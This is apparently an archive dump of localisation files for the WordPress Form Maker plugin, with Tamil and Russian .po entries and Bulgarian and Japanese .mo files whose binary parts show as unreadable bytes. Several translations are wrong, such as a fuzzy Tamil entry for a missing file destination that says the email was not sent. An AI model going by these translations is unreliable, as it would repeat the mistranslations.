#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "நவம்பர்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "டிசம்பர்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "பிழை, தவறான பாதுகாப்பு குறியீடு."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr "உங்கள் IP தடுக்கப்பட்டது. இணைய நிர்வாகியை தொடர்பு கொள்க"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "கோப்பு அனுமதிக்கப்பட்ட அளவை விட அதிகமாக"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "மன்னிக்கவும், நீங்கள் இந்த வகை கோப்பை பதிவேற்ற அனுமதி இல்லை."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "பிழை, கோப்பு நகர்த்த முடியாது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"இந்த புலம் %s ஒரு தனிப்பட்ட உள்ளீடு தேவைப்படுகிறது மற்றும் இந்த மதிப்பு ஏற்கனவே "
"சமர்ப்பிக்கப்பட்டது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "பிழை, மின்னஞ்சல் அனுப்பப்படவில்லை."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "எதுவும் சமர்ப்பிக்கப்பட்டது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "உங்கள் படிவத்தை வெற்றிகரமாக சமர்ப்பிக்கப்பட்டது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "பிழை, மின்னஞ்சல் அனுப்பப்படவில்லை."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "உங்கள் மின்னஞ்சல் முகவரியை ஏற்கனவே சரிபார்க்கப்பட்டது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "உங்கள் மின்னஞ்சல் வெற்றிகரமாக பரிசோதிக்கப்பட்டது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "உங்கள் மின்னஞ்சல் சரிபார்ப்பு காலாவதியானது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "சரிபார்ப்பு இணைப்பு தவறானது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "புலத்தில் தேவைப்படுகிறது."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "இந்த ஒரு செல்லுபடியாகும் மின்னஞ்சல் முகவரி அல்ல."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"நீங்கள் முன்னாள் தேதிகள் தேர்ந்தெடுக்க முடியாது. தற்போதைய ஒரு இருந்து, ஒரு தேதி தேர்வு."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "மதிப்பு இடையே இருக்க வேண்டும் "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "அளவு"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "உங்கள் மதிப்பெண் குறைவாக இருக்க வேண்டும்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "பெயர்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "முதல்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "கடந்த"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "நடுநிலை"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "பகுதி குறியீட்டு"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "தொலைபேசி எண்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "டாலர்கள்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "சென்ட்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "இருந்து"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "வேண்டும்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "செல்ல "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "மீட்டமை "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "வெளிக்கள தேர்வு "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "ஒரு தேதி தேர்வு"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-bg_BG.mo000060400000010677152434416630012146 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��
A
L
j
w
~
�
�
�
G�
J�
B@�
������+��,FUf������i
*q

�
�
�
F�
�6���=��B�=�:$=_p�N)]7�4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:50+0400
PO-Revision-Date: 2015-05-22 16:51+0400
Last-Translator: 
Language-Team: 
Language: bg
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
априлРегионалния кодавгустCents SofiaДържавадекемвриDollars Грешка, електронна поща не е изпратено.Грешка, файлът не може да бъде преместен.Грешка, неправилно Код за сигурност.февруариПърваот отидете януариюлиюниДата на последния одит. мартМайСреденНищо не беше представен.ноемвриоктомвриТелефонен номерПощенски / Zip кодколичество Reset Изберете датаИзберете поле септемвриЗа съжаление, не е позволено да се качите на този тип файл.Щат / Провинция / РегионУлицаАдрес Ред 2The Файлът превишава допустимия размер наТова поле %s изисква уникален влизане и тази стойност вече е изпратена.Това не е валиден имейл адрес.НаименованиезаПроверка на връзката е невалиден.Не можете да изберете бивши дати. Изберете дата, започвайки от настоящата.Вашият имейл адрес е вече проверена.Вашият имейл е успешно проверена.Проверка Вашият имейл приключи.Вашият форма е успешно изпратена.Вашият IP е черна. Моля, свържете се с администратора на сайта. Вашият резултат трябва да бъде по-малко от Полето е задължително.стойност трябва да бъде между languages/form_maker-ja.mo000060400000010201152434416630011557 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
%F
l
	s
	}
�
	�
�
6�
E�
6SZahpw~����$�	����
�
�"5o<����3�o 
<�
�
�
'�
yEz<�H�0F}w=�!3+U4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:59+0400
PO-Revision-Date: 2015-05-22 16:59+0400
Last-Translator: 
Language-Team: 
Language: ja
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
4月エリア コード。市外局番。8月セント都市名国名12月ドルエラーメールが送信されませんでした。エラーは、ファイルを移動することはできません。エラー、間違ったセキュリティコード。2月名前から行く 1月7月6月最終3月5月中何も送信されていません。11月10月電話番号郵便番号数量。 リセット 日付を選択フィールドを選択します 9月申し訳ありませんが、この種類のファイルをアップロードすることはできません。都道府県/州/地域住所ストリート住所2行目Theファイルの許容サイズを超えていますこのフィールドは、 %s固有のエントリを必要とし、この値が既に提出されました。EXAMPLEUSERNAME2 は無効なメール アドレスです。役職へ確認用のリンクは無効です。あなたは元の日付を選択することはできません。現在の1から開始日を選択してください。あなたのメールアドレスは既に確認されています。あなたのメールが正常に検証されています。あなたの電子メールの検証がタイムアウトしました。フォームが正常に送信されました。あなたのIPがブラックリストに登録されている。ウェブサイトの管理者に連絡してください。あなたのスコアは以下でなければなりません フィールドは必須です。値はの間でなければなりません languages/form_maker-ru_RU.po000060400000060657152434416630012250 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:03+0400\n"
"PO-Revision-Date: 2015-05-22 17:03+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ru\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Улица"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Адрес строка 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Город"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Штат / Область / регион"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Почтовый / Индекс"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "СТРАНА"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Январь"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Февраль"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Марта"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Апреля"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Май"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Июнь"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Июля"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
